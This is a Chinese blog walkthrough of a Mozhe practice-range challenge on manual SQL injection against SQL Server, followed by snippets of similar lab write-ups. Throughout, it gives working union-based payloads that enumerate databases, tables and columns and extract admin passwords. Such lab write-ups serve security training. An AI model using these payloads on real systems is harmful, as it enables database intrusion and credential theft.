墨者-SQL手工注入漏洞测试(Sql Server数据库) 题解

最新推荐文章于 2023-01-25 15:52:11 发布
最新推荐文章于 2023-01-25 15:52:11 发布
阅读量3k 收藏 4
点赞数
分类专栏: sql注入 靶场 文章标签: sqlserver 渗透测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Redredredfish/article/details/121908983
版权

靶场地址:https://www.mozhe.cn/bug/detail/SXlYMWZhSm15QzM1OGpyV21BR1p2QT09bW96aGUmozhe

①老样子url:http://219.153.49.228:49515/new_list.asp?id=2

判断id存在数字型注入

②判断当前字段数

id=2 order by 4 正常
id=2 order by 5 报错
字段数为4

③联合查询当前数据库

先用mysql的语法试一试

第一个坑:
id = 2 union select 1,2,3,4 报错
百度之后发现unionunion all的区别

union 会将查询结果去除重复项
union all则是单纯拼接
其实这一点在mysql中也一样

第二个坑:
id = 2 union all select 1,2,3,4 还是报错
看了别人的题解发现都是用id=2 and 1=2这个页面来回显,想了一下发现被误导了,其实只要id不是2就行

第三个坑:
id =3 union select 1,2,3,4 还是报错
查了之后发现sqlserver 和MySQL union语法的区别
除了字段数要匹配之外,字段类型也要匹配
比较神奇的一点:

字符型只能匹配字符型
数字型可以匹配字符型和数字型

例如users表有三个字段:user(char)、passwd(char)、ID(int)
在这里插入图片描述
新建查询1

select * from test.dbo.users where ID=1 union all select 1,2,3

在这里插入图片描述
报错说明char无法匹配int

新建查询2

select * from test.dbo.users where ID=1 union all select '1','2',3

在这里插入图片描述
结果正常

新建查询3

select * from test.dbo.users where ID=1 union all select '1','2','3'

在这里插入图片描述
结果正常,说明int可以匹配char

所以对id=3 union all select 1,2,3,4进行排列组合尝试
最后发现3是字符型
所以id=3 union all select 1,2,‘3’,4 成功回显,改成’2’,'3’也一样
在这里插入图片描述
回到正题,利用回显查询当前表

id=3 union all select 1,2,db_name(),4
获得当前数据库名mozhe_db_v2

④获取当前库中表名

第四个坑
回显点只能输出一条数据
id=3 union all select 1,2,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),4

  1. top x函数代表前x列值。
  2. 为啥不用concat?因为concat函数直到sql server2012才有,因为限制输出一条数据,sql server2005也没有类似limit的函数,所以低版本sql server如果要查询某一条数据会比较麻烦。
  3. xxx…sysobjects表中存储了xxx库的敏感信息,类似mysql中的information_schema.tables,也可以写成xxx…sysobjects表示跨库调用表
  4. name字段,即库中表名
  5. xtype='U’指用户建立,xtype='S’指系统建立

像这种只允许一条数据输出的情况

方法一:类似id的唯一标识
例如查询所有库名
select name from master..sysdatabases where dbid = xxx
在这里插入图片描述
有唯一标识字段dbid则可以利用爆破的方法

方法二:双TOP查询
例如:
test库的users表中有ID字段,可以利用双top查询语句查出任意一条数据

select top 1 ID from (select top 10 ID from test..users order by ID) as a order by ID desc

里面的查询语句select top 10 ID from test..users order by ID指以ID字段正序排列查询top 10的数据
外面的select top 1 ID from (。。。) as a order by ID desc指以ID字段倒序排列查询top 1的数据
这样查出来的话就是第10条数据,不断增加’10’这个参数即可查出所有数据。

回归靶场,要查询出库mozhe_db_v2的所有表,也可以用双top查询

id=3 union all select 1,2,(select top 1 name from (select top x name from mozhe_db_v2..sysobjects where xtype='U' order by name) as a order by name desc),4
只要改变x的值就可以查出所有数据

得到表名有两个manage、announcement

⑤获取表中字段

方法一:col_name()和object()

col_name(id,x)函数可以得到id对应数据表字段序列的某一个
参数id指数据表的唯一id
参数x指序列下标,也就是第几个

object(‘x’)函数可以获取数据表的唯一id,仅对用户创建的数据表适用
参数x指数据表

组合一下,即col_name(object('xxx'),x),从xxx表中获取第x个字段名
靶场中即
id=3 union all select 1,2,(select col_name(object_id('manage'),x)),4
修改x的值即可得到全部字段名

方法二:双top查询
sql sever有一个syscolumns表存储了所有字段信息,类似mysql中的information_schema.columns

select name from syscolumns where id=object_id('表名')
问题在这个靶场只能回显一条数据,跟上文一样可以利用双top查询任意一条数据

最后获得字段名id,username,password

⑥获取数据

id=3 union all select 1,(select password from manage where username=(select username from manage) ),'3',4

总结一下

①大致的过程和msyql联合查询基本一致
查库——查表——查字段——查数据

②sql server<2012限制一条数据输出可以用双top查询,高版本直接用cancat()

Redredredfish
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
墨者靶场SQL手工注入漏洞测试(Sql Server数据库)
曹振国的博客
06-20 435
Mssql关于SqlServer进入环境:1.寻找注入点:2.查询字段数:3.查询输出点:4.查询库名:5.查询表:6.查询字段:7.查询数据:MD5解码,进入后台拿到key值: 关于SqlServer MSSQL显错注入和MYSQL不太一样: 联合查询,记住要写UNION ALL 然后猜输出点要使用NULL去填充 注释只有-- + 进入环境: 1.寻找注入点: ?id=1 //报错 ?id=2 //正常 2.查询字段数: 有4个字段 ?id=2 and 1=1 order by 4 //正常
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
墨者SQL注入实战-MySQL
wswr的博客
03-14 1879
思路:实话实话,我前面学的能试的都试了,比方单引号,sleep(), and 1=1,宽字节,http注入,甚至对这个请求包进行了各种蹂虐,发现真的只要没有MQo这仨是一定不回显别的,所以我想,这应该不仅仅只是过滤了字符,那要从哪方面再来思考呢,还记得前面学了编码绕过吗,后端了做了字符的过滤,我们用编码绕过,有没有一种可能现在是后端做了编码的限制呢,这个时候我们就可以再考,为什么是id=MQo才能回显,就是说MQo的编码方式是正确,那百度一搜就会发现,MQo对应的base64编码是1,好的,那就破案了,这题
墨者学院手工sql注入sql server
qq_52074678的博客
03-09 405
1.测试是否存在sql注入 219.153.49.228:47998/new_list.asp?id=2 and 1=1 回显正常 219.153.49.228:47998/new_list.asp?id=2 and 1=2 回显报错 存在SQL注入 2.猜解字段 219.153.49.228:47998/new_list.asp?id=2 order by 4 回显正常 219.153.49.228:47998/new_list.asp?id=2 order by 5 ...
墨者SQL手工注入漏洞测试(MySQL数据库)
wswr的博客
03-10 349
掌握流程,判断注入点,找数据库版本和数据库,然后表,然后字段,然后数据 右键查看源码,发现看上去能注入的页面 用 and 1=1 和 and 1=2发现注入点 然后用order by去找这个查询语句查多少个字段一直试到5发现没有页面反弹,说明只有4个 然后再用union查询 注意 id=-1 这样就回弹就显示后面不显示前面的 发现只有23回弹,说明我们一会测试值也要防2,3位置 先看数据库版本和数据库 union select 1,vers...
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库)
weixin_42789937的博客
01-25 314
墨者学院04 SQL手工注入漏洞测试(Sql Server数据库),熟悉的配方,熟悉的味道~
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
11-13
墨者有巨子腹-居秦阅读答案】墨者有巨子腹.docx
墨者-mssql手工注入
星空下de青铜
05-09 294
发现链接 and 1=1正常 and 1=2错误 ‘ 错误 存在注入 order by 3错误 4正常 5错误 and (select count() from sysobjects) >0 MSSQL and (select count() from msysobjects) >0 ACCESS id =-2 union all select null,null,null,null 4个null 发现2成功回显 看数据库有啥 个人猜测为mozhe_d
墨者学院-入门级-SQL手工注入漏洞测试(MySQL数据库)-小白必看(超详细)
kitiu666的博客
04-26 1020
2021年2月2日,第八次渗透测试。 这次实践SQL的盲注,知识点比较多,除了实验的讲述还会加上知识点的讲解; 测试寻找注入口: 1,、进入靶场,发现界面和之前做过的实验一样,我们需要进入“维护通知的地址”进行说起来的注入; 2、我们直接进在地址栏进行SQL语句的注入测试; 在地址栏加上语句“and 1=1”,页面可以正常显示。再尝试加入语句“and 1=2”,页面显示出错,没有了相关内容。说明地址栏是一个sql 的一个注入口;(原理说明可以看我之前做过的实验博客) sql语句注入: 3、发现了注入
墨者 SQL手工注入漏洞测试(MySQL数据库)
qq_52715164的博客
04-04 1885
测试注入点 http://124.70.64.48:40014/new_list.php?id=1sdaf 不显示,说明存在注入点 order by http://124.70.64.48:40014/new_list.php?id=1%20order%20by%205 报错猜解准备 http://124.70.64.48:40014/new_list.php?id=-1%20union%20select%201,2,3,4 查询信息(联合注入)(注意 id=后面需要用个错误的值,如-.
墨者学院 - SQL过滤字符后手工注入漏洞测试(第1题)
多崎巡礼的博客
09-28 2677
一开始怎么加字符都不行,才发现应该是检测到我注入以后跳转了; (过滤了空格和一些常规查询字符,“+”号也过滤了,大小写不能绕过那就URL编码吧) 和以往的套路一样,猜得到字段是4个。。。 http://219.153.49.228:44375/new_list.php?id=-1/**/union/**/select/**/1,database(),version(),4 url编码构造如...
SQL server注入
weixin_44110913的博客
05-28 317
一、基础知识 系统数据库 master数据库 master是SQL server最重要的数据库,是整个数据库的核心,用户不能直接修改。里面数据库包括用户的登陆信息、用户所在的组、所有系统的配置选项、服务器中本地数据库的名称和信息、初始化方式等。 model数据库SQL server创建数据库的模板,任何对model数据库中数据的修改都将影响所有使用模板创建的数据库。 msdb数据库 提供SQL server Ag...
[转] sql注入手工注入示例详解
weixin_34293141的博客
12-24 267
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL Server备份/还原 SQL注入
天道酬勤
03-31 1235
SQL还原目标数据库  注:不能在目标数据库会话中执行 alter database test set single_user with rollback immediate--(这里也可以延迟几秒回滚你的操作) restore database test from disk='d:\test.bak' alter database test set multi_user 无意中
SQLServer数据库注入-墨者学院(SQL手工注入漏洞测试(Sql Server数据库))
T1ngSh0w的博客
09-07 1240
SQLServer数据库注入-墨者学院-SQL手工注入漏洞测试(Sql Server数据库)详细讲解
Sql Server 手工注入总结(显错模式)
桦少's blog
01-31 939
--显错模式总结,利用类型转换报错。 --1=convert(int,(@@version)) --1=convert(int,(select host_name())) --and 1=convert(int,(user)) --爆表名记录条数。replace(字段名,' ','') select replace(str(count(*))+'N',' ','') from sys
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值